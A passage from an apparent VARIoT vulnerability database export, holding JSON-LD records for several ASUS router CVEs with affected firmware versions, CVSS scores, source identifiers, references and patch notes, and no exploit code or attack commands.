            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "date": "2014-01-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "date": "2014-01-21T00:00:00",
            "db": "BID",
            "id": "65046"
          },
          {
            "date": "2014-01-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "date": "2014-01-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "date": "2014-01-22T05:22:12.737000",
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "date": "2016-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "date": "2014-01-21T00:00:00",
            "db": "BID",
            "id": "65046"
          },
          {
            "date": "2016-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "date": "2014-01-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-N56U and  RT-AC66U Router firmware buffer overflow vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201307-0434

    Vulnerability from variot - Updated: 2025-04-11 22:55

    Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. A directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks. Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201307-0434",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.220"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "7.0.2.38b"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "1.0.1.9"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.3.108"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.3.178"
          },
          {
            "model": "dsl-n56u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "1.0.0.9"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.3.162"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.246"
          },
          {
            "model": "rt-n14u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.356"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-n66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.370"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.342"
          },
          {
            "model": "dsl-n55u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.7c"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.8l"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.334"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "8.1.1.4"
          },
          {
            "model": "rt-n56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.360"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.140"
          },
          {
            "model": "rt-ac66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.354"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.318"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "dsl-n56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.364"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.342"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.4o"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.322"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "7.0.1.21"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "7.0.1.32"
          },
          {
            "model": "rt-n16",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.354"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.134"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.270"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.3.176"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.246"
          },
          {
            "model": "rt-n65u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.346"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.8j"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.7f"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.8n"
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.272"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.220"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.1.4"
          },
          {
            "model": "dsl-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.188"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "1.0.2.3"
          },
          {
            "model": "dsl-n56u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.314"
          },
          {
            "model": "rt-n65u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.334"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "dsl-n55u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "dsl-n56u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n14u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n14u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n65u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n65u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.4.372"
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.356"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:asus:dsl-n55u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:dsl-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-ac66u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-n14u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n14u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-n16",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n16_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-n56u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-n65u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n65u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:asus:rt-n66u",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Kyle Lovett",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2013-4937",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-4937",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2013-08385",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-64939",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-4937",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-4937",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2013-08385",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201307-570",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-64939",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. \nA directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks.         Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "db": "BID",
            "id": "60780"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          }
        ],
        "trust": 3.06
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-4937",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "60780",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "db": "BID",
            "id": "60780"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "id": "VAR-201307-0434",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          }
        ],
        "trust": 1.291374855714286
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:55:57.018000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Firmware update 3.0.4.372 for ASUS routers with AiCloud fixes found vulnerabilities",
            "trust": 0.8,
            "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
          },
          {
            "title": "Networking",
            "trust": 0.8,
            "url": "http://www.asus.com/Networking/Wireless_Routers_Products/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "http://twitter.com/asususa/statuses/357612236392509440"
          },
          {
            "trust": 1.7,
            "url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/bid/60780"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4937"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4937"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "db": "BID",
            "id": "60780"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-06-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "date": "2013-07-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "date": "2013-06-24T00:00:00",
            "db": "BID",
            "id": "60780"
          },
          {
            "date": "2013-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "date": "2013-06-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "date": "2013-07-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "date": "2013-07-26T12:05:40.867000",
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-06-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "date": "2013-07-26T00:00:00",
            "db": "VULHUB",
            "id": "VHN-64939"
          },
          {
            "date": "2013-07-29T13:14:00",
            "db": "BID",
            "id": "60780"
          },
          {
            "date": "2013-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-003514"
          },
          {
            "date": "2013-07-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "date": "2013-08-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-4937"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-570"
          }
        ],
        "trust": 1.2
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-N66U Directory Traversal Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-08385"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          }
        ],
        "trust": 1.2
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-145"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201911-1519

    Vulnerability from variot - Updated: 2024-11-23 23:01

    Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state

    Show details on source website

